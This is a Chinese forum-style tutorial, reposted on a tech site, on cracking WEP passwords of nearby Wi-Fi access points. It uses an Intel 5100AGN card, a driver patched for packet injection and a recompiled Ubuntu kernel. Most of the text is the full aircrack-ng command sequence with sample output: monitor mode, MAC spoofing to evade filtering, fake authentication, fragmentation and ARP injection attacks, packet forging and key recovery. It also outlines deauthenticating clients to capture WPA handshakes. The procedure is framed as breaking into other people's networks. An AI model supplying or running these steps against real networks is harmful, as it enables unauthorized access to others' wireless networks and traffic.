您的位置:首页 > 运维架构 > Linux

Linux下使用Intel_WiFi_Link_5100AGN 破解无线加密

2010-09-14 11:51 405 查看

Linux下使用Intel_WiFi_Link_5100AGN 破解无线加密

就是传说中的BT4破解
ㄝㄙㄩㄧㄝ 回答:1 人气:16 解决时间:2010-02-24 14:55
满意答案
该网站为5100AGN 提供了支持注入的驱动升级,提供了C 源代码 和 diff 文件。
2. http://tinyshell.be/aircrackng/forum/index.php?topic=4217.0
该网站验证了5100AGN 能工作于注入模式,并提供升级网卡驱动的思路。
3. http://www.wlanbbs.com
中国无线论坛网,着重参考了“中卫”写的《BT3 破解无线WEP/WPA 教程》。
测试环境说明
1. 测试目的: 破解WEP 密码
2. 测试系统: Ubuntu Linux 8.10
3. 测试网卡: Intel WiFi Link 5100AGN
4. 破解软件: aircrack
5. 网卡驱动: Stefanik Gábor 2008 年9 月23 日写的驱动
XP 下的准备工作
Linux 下当然都能完成这些准备工作,不过是菜鸟么,怎么熟悉怎么来。
1. 安装 Ubuntu 8.10,新手建议在Windows 下使用wubi 直接安装,非常非常的方便!
2. http://kernel.org/pub/linux/kernel/v2.6/ 选择 linux‐2.6.27.7.tar.gz 下载。当然日后更新的
内核版本应该也能使用,目前能确认的是2.6.27‐rc7,2.6.27‐rc8 的内核版本都能使用。
3. http://git.kernel.org/?p=linux/kernel/git/linville/wireless‐testing.git;a=commit;h=84e8e77f61
8f589316e83dfa1bfafe5a47bf0bd2 下载3 个支持注入的5100AGN 的驱动源文件,名字为
iwl‐agn.c 和iwl‐sta.c 以及 iwl‐tx.c。
4. 为图方便,可以在XP 下查看好要破解WEP 的SSID、MAC 地址、工作信道等信息,并用
txt 文件保存好。
Ubuntu 下的准备工作
1. 装好的 Ubuntu 网卡驱动是直接支持5100AGN 的,只是不能工作在注入模式。首先还是
需要一个可用的网络来下载点东西。
2. 进入 root 权限。Ubuntu 默认情况不允许用root 帐户登陆,获得root 权限的方法很多,
讲个对日后操作最方便的方法。
首先,打开终端,输入指令sudo passwd root,设置新的root 帐户密码。
然后在左上角点击System‐>Preferences‐>Login Window 菜单,选择Security 选项,
接着选中其中的“Allow Local system administrator login”选项,确认设置。
最后Ctrl+Alt+退格,输入root 及密码重新登陆即可。
这样就永久获得了root 权限,可以在Ubuntu 中随意的用鼠标拷贝粘贴文件了。
3. sudo apt‐get install aircrack,安装破解软件aircrack
4. 下载一些配置要用的软件(如果并不想自己配置内核,可跳过)
sudo apt‐get install build‐essential bin86 kernel‐package
sudo apt‐get install libqt3‐headers libqt3‐mt‐dev
5. 稍等片刻,全部下载安装完成后,开始更新网卡驱动,编译 Linux 内核。
打开并解压缩下载的linux‐2.6.27.7 的内核,把解压后的文件整个拷贝到 /usr/src 的目录
下。在这个目录下,还会有几个别的版本的内核文件在呢。
打开这个新内核 /drivers/net/wireless/iwlwifi/,用下载的支持注入的iwl‐agn.c 和iwl‐sta.c
以及iwl‐tx.c 三个文件覆盖掉原来的文件。
6. sudo mv linux linux.bak,确保没有叫linux 的这个链接(好像和快捷方式的概念差不多)
sudo ln ‐s ./linux‐2.6.27.7 linux,把下载的新内核链接到linux
cd linux,进入linux 这个目录
7. 配置内核。配置内核是件困难的事情!参数繁多,一不小心就会导致升级失败。所以基
本思路是把当前内核配置文件拷贝过来一用。
sudo cp /boot/config‐`uname ‐r` .config,复制当前的内核配置。
sudo make xconfig,当然如果想自己再看看配置,微调一下也可以。然后会弹出一个配
置内核的窗口,对配置内核感兴趣的google,我基本没改。
8. 弄了份现成的配置文件,下一步就是编译了。为以后升级方便,先打包成 deb 包。
cd /usr/src/linux
sudo ‐s –H
make‐kpkg clean
sudo make‐kpkg ‐‐initrd –revision=diy1 kernel_image kernel_headers
最后行输入完毕后,编译需要一个多小时,在确认开始编译后,该干吗干吗去!
9. 安装新的内核。在你的耐心差不多消磨至尽的时候,破解的准备工作也到了最后一步了。
sudo dpkg ‐i /usr/src/kernel‐image‐2.6.27.7*.deb,安装内核包
sudo dpkg ‐i /usr/src/kernel‐headers‐2.6.27.7*.deb,安装内核headers 包
也非常有必要到/usr/src 中把这两个deb 文件给拷贝出来,下次重装Linux 升级可就不用
这么麻烦了。
sudo dpkg -i <name of the file>,设置grub 默认引导
现在重启一下,如果顺利,会自动进入2.6.27.7 的新内核。
破解WEP 密码
1. 做了这么多准备工作,终于可以开始动手做想做的事情了。建议大家先别急着输指令,
可以新建个文本文件,把要输入的指令,要破解的SSID 号,MAC 地址,信道等等全部
安安心心的用拷贝、粘贴大法全部清晰的输入好。
2. 新建一个终端
sudo –s
可省,输入密码后,进入root 权限。
lsmod
可省,查看驱动列表。反馈信息如下,可以在里面找到5100AGN 的驱动。
Module Size Used by
nls_iso8859_1 12288 1
nls_cp437 13952 1
vfat 18816 1
fat 57504 1 vfat
............
modinfo iwlagn
可省,查看网卡驱动的详情。反馈信息如下。
filename: /lib/modules/2.6.27.7/kernel/drivers/net/wireless/iwlwifi/iwlagn.ko
alias: iwl4965
license: GPL
author: Copyright(c) 2003‐2008 Intel Corporation
version: 1.3.27ks
description: Intel(R) Wireless WiFi Link AGN driver for Linux
firmware: iwlwifi‐4965‐2.ucode
srcversion: xxxxxxxxxxxxxxxxxxxxxxx
ifconfig –a
可省,查看本机网卡详情。反馈信息如下
eth0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:219 Base address:0x8000
Lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:246 errors:0 dropped:0 overruns:0 frame:0
TX packets:246 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:15408 (15.4 KB) TX bytes:15408 (15.4 KB)
pan0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
wlan0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx
UP BROADCAST MULTICAST MTU:1492 Metric:1
RX packets:19 errors:0 dropped:0 overruns:0 frame:0
TX packets:20 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5188 (5.1 KB) TX bytes:3895 (3.8 KB)
wmaster0 Link encap:UNSPEC HWaddr xx‐xx‐xx‐xx‐……
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
特别关注下深绿色标注的地方,wlan0 为网卡代号,xx:xx:xx:xx:xx:xx 为本机MAC。
airmon‐ng
可省,查看本机的网卡。反馈信息如下
Interface Chipset Driver
wlan0 iwlagn ‐ [phy0]
macchanger –m 00:11:22:33:44:55 wlan0
可省,修改自己网卡的MAC 地址。当对方设置了MAC 地址过滤时才有必要用吧,要用
的话需要下载一下的。
airmon‐ng start wlan0 6
必须的!让网卡在信道6 处监听信息。数字6 就是要破解AP 的工作信道(channel)。
Interface Chipset Driver
wlan0 iwlagn ‐ [phy0]
(monitor mode enabled on mon0)
会返回一个mon0 处于监听模式的提示,输入第二次的话会变成mon1,类推。
aireplay‐ng ‐9 mon0
可选,测试注入攻击。如果测试通过,破解WEP 就易如反掌了。反馈信息如下
21:00:55 Trying broadcast probe requests...
21:00:55 Injection is working!
21:00:56 Found 3 APs
……
如果第二行返回值是No Answer,可能原因有很多,其中包括网卡驱动的问题。
如果第二行返回值是Injection is working,就说明网卡已经工作在注入攻击模式下。
然后软件会去ping 每个找到的AP,这里可以得到信道上所有AP 的SSID、MAC、信道、
信号强度等等。
airodump‐ng –ivs –w name –c 6 mon0
必须的!抓ivs 包,name 为储存文件的名字,6 为信道,然后会有个一直在抓包的界面
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ES
xx:xx:xx:xx:xx:xx 179 3 159 0 0 6 54. WEP WEP T
特别关注 #Data 这栏,它的值就是抓到的ivs 的数量,目前涨的很慢,当我们在第二个
终端中敲几个指令后,就会发现它涨的飞快,过了1 万,就可以用第三个终端来破解密
码了!
3. 新建第二个终端,不要关掉第一个终端!
aireplay‐ng ‐1 0 ‐e TP‐LINK ‐a 000000000000 ‐h 111111111111 mon0
必须的!进行伪装链接,TP‐LINK 为要破解AP 的SSID,000000000000 为要破解AP 的
MAC 地址,111111111111 为本机网卡的MAC 地址,如果用macchanger 伪装过,就输
入伪装后的MAC 地址。
aireplay‐ng ‐5 ‐b 000000000000 ‐h 111111111111 mon0
必须的!获得至关重要的xor 文件,参数说明同上个指令。需要一点点抓有效包的时间。
成功以后输入y,会得到一个fragment‐XXXXX‐XXXXXX.xor 的文件,XXXXX 是数字。
packetforge‐ng ‐0 ‐a 000000000000 ‐h 111111111111 ‐k 255.255.255.255 ‐l 255.255.255.255
‐y fragment‐XXXXX‐XXXXXX.xor ‐w mrarp
必须的!参数说明同上个指令。fragment‐XXXXX‐XXXXXX.xor 就是上个指令中获得的文件。
aireplay‐ng ‐2 ‐r mrarp ‐x 1024 mon0
必须的!注入攻击。
此时第一个终端内的#Data 栏的值应该在飞速增长。
4. 新建第三个终端,前两个终端都不要关闭。
在 #Data 栏的数据达到10000 以上时,就可以破解了。
aircrack‐ng ‐n 64 ‐b 000000000000 name‐01.ivs
必须的!破解WEP 密码,000000000000 是要破解AP 的MAC 地址。
一般地,几秒内密码就出来了。如果对方的密码设置的比较牛,多抓些ivs 包后再破解
即可。保存好WEP 密码,退出三个终端。
破解WPA 密码
要破解WPA 密码,必须要抓到握手协议包。这个不难,基本思路是在有客户端的情况
下攻击该客户端使其断线,然后监听其重新联网时的握手协议包。可参考中国无线论坛网
“中卫”写的《BT3 破解无线WEP/WPA 教程》。
但WPA 只能暴力破解,如果没有任何关于密码的信息。光数字加小写字母的8 位密码
字典就能有几G 大小,要穷举这些密码,现在的电脑速度还远远不够。所以在没有任何关
于密码信息的情况下,要破解WPA 只能是浮云……这里也就没必要多介绍了。
破解WEP 密码总结
本人研究WEP 密码破解就此告一段落。从一个完全对破解和Linux 一窍不通的人,通过
论坛,google,到目前基本弄清了无线网加密技术及破解方法的基本思路和一些皮毛,还是
小有成就的。而意外接触Ubuntu 更是让我对Linux 兴趣大增,没想到Linux 已经变得如此方
便!以前望而却步的内核编译也算比较顺利的完成了,当然没玩什么配置,不过有了第一次
成功的体验,以后也就敢于慢慢深入了。
这次用5100AGN 破解WEP 密码最大的收获就是:如果想做一件事情,就多做少说,潜
心研究!尤其作为菜鸟,要少发问,多实践,有信心和耐心来攻破难题,定能成功!
全文完
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: